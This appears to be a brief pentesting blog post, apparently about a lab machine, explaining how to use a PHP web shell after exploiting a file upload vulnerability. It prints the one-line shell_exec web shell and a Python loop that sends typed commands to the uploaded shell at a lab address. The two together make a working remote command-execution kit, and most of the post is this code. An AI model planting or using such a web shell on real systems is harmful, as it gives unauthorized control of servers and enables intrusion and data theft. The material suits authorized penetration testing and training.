Suppose you are pentesting a web app and you have found a file upload vulnerability and have successfully uploaded a php file that has this content:
<?php echo shell_exec($_GET['cmd']); ?>Everytime you need to execute command to find out more about the system that hosts that web app you may need to do something like this:
I am writing a python code which simply throws up results to the terminal, the code looks like this.
import requests
# change your url accordingly to where your <?php echo shell_exec($_GET['cmd']); ?> is uploaded to.
url = "http://10.10.10.6/torrent/upload/194c4c7e769cc2a5bb902d6d40a8c34238cf4a22.php"
try:
while True:
cmd = input("> ")
response = requests.post(url, params={"cmd": cmd})
print(response.text)
except KeyboardInterrupt as e:
print("bye!")
The result looks like this.
cyruslab 